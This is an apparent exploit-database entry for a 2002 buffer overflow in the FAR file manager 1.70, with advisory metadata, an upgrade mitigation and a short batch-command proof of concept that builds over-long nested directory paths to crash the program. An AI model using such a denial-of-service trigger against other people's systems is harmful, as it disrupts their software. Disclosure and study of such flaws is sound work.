header-logo
Suggest Exploit
vendor:
FAR
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: FAR
Affected Version From: FAR 1.70
Affected Version To: FAR 1.70
Patch Exists: YES
Related CWE: N/A
CPE: //a:far
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Buffer Overflow Vulnerability in FAR

A buffer overflow vulnerability has been reported for FAR that may result in a denial of service condition. The vulnerability exists due to insufficient bounds checking performed by FAR when parsing directory paths. Specifically, when FAR attempts to parse overly long paths it will crash thereby resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of FAR
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6822/info

A buffer overflow vulnerability has been reported for FAR that may result in a denial of service condition. The vulnerability exists due to insufficient bounds checking performed by FAR when parsing directory paths. Specifically, when FAR attempts to parse overly long paths it will crash thereby resulting in a denial of service condition. 

SET A=A<260 chars>A
SET B=BBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\

Navigation

Suggest Exploit

Services By CQR